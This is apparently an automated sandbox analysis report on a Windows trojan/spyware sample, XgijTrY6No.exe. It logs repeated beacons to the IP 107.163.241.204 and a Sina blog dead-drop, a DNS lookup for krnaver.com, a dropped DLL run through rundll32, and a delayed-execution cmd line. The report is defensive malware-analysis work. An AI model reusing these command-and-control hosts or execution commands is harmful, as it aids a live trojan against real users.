Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global traffic
DNS traffic detected: DNS query: krnaver.com
Source: global traffic
DNS traffic detected: DNS query: blog.sina.com.cn
Source: rundll32.exe, 00000006.00000003.3758155005.0000000000D23000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: http://107.163.241.204:12354/show.php
Source: rundll32.exe, rundll32.exe, 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp String found in binary or memory: http://blog.sina.com.cn/u/%s
Source: rundll32.exe, 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp String found in binary or memory: http://blog.sina.com.cn/u/%sXGRyaXZlcnNcZXRjXGhvc3RzLmljcw==XGRyaXZlcnNcZXRjXGhvc3Rz
Source: rundll32.exe, 00000006.00000002.3803023615.0000000000CCA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3803023615.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3803023615.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3803023615.0000000000C6E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://blog.sina.com.cn/u/5655029807
Source: rundll32.exe, 00000006.00000002.3803023615.0000000000CCA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://blog.sina.com.cn/
Source: rundll32.exe, 00000006.00000003.2422920583.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1813762319.0000000000D34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3803023615.0000000000C6E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3071281496.0000000005BA8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://blog.sina.com.cn/u/5655029807
Source: unknown HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:49834 version: TLS 1.2

System Summary

Source: rjqzr.dll.5.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 49%
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_1000C160: wsprintfA,DeviceIoControl,6_2_1000C160
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_100049F0 ExitWindowsEx,6_2_100049F0
Source: C:\Users\user\Desktop\XgijTrY6No.exe Code function: 0_2_00414D00 0_2_00414D00
Source: C:\Users\user\AppData\Local\Temp\mszcy.exe Code function: 5_2_00414D00 5_2_00414D00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_10005A10 6_2_10005A10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_1000EB80 6_2_1000EB80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_1000DB90 6_2_1000DB90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_10010400 6_2_10010400
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_1000F500 6_2_1000F500
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_10009690 6_2_10009690
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_1000EF70 6_2_1000EF70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10001000 appears 293 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10011A66 appears 47 times
Source: XgijTrY6No.exe Binary or memory string: OriginalFilename vs XgijTrY6No.exe
Source: XgijTrY6No.exe, 00000000.00000000.1340687159.0000000000414000.00000080.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameDSignTool4 vs XgijTrY6No.exe
Source: XgijTrY6No.exe, 00000000.00000003.1343399810.0000000002128000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameDSignTool4 vs XgijTrY6No.exe
Source: XgijTrY6No.exe Binary or memory string: OriginalFilenameDSignTool4 vs XgijTrY6No.exe
Source: XgijTrY6No.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: rjqzr.dll.5.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@22/3@51/3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_1000C230 sprintf,CreateFileA,DeviceIoControl,GetLastError,FormatMessageA,CloseHandle,wsprintfA,6_2_1000C230
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_10004F60 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,6_2_10004F60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_100060E0 strrchr,strncpy,strncpy,strncpy,GetSystemInfo,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,sscanf,6_2_100060E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_10004B90 AdjustTokenPrivileges,6_2_10004B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_10004AA0 CreateToolhelp32Snapshot,6_2_10004AA0
Source: C:\Users\user\Desktop\XgijTrY6No.exe Code function: 0_2_00401A2A FindResourceA,LoadResource,0_2_00401A2A
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\krnaver.com:6520
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\0x5d65r455f
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\Mkrnaver.com:6520
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:592:120:WilError_03
Source: C:\Users\user\Desktop\XgijTrY6No.exe File created: C:\Users\user\AppData\Local\Temp\mszcy.exe
Source: C:\Users\user\Desktop\XgijTrY6No.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\mszcy.exe Process created: C:\Windows\SysWOW64\rundll32.exe c:\windows\system32\rundll32.exe "c:\ftelcs\rjqzr.dll",QueryPluginInterface C:\Users\user\AppData\Local\Temp\mszcy.exe
Source: XgijTrY6No.exe ReversingLabs: Detection: 89%
Source: C:\Users\user\Desktop\XgijTrY6No.exe File read: C:\Users\user\Desktop\XgijTrY6No.exe
Source: unknown Process created: C:\Users\user\Desktop\XgijTrY6No.exe "C:\Users\user\Desktop\XgijTrY6No.exe"
Source: C:\Users\user\Desktop\XgijTrY6No.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 2&C:\Users\user\AppData\Local\Temp\\mszcy.exe "C:\Users\user\Desktop\XgijTrY6No.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
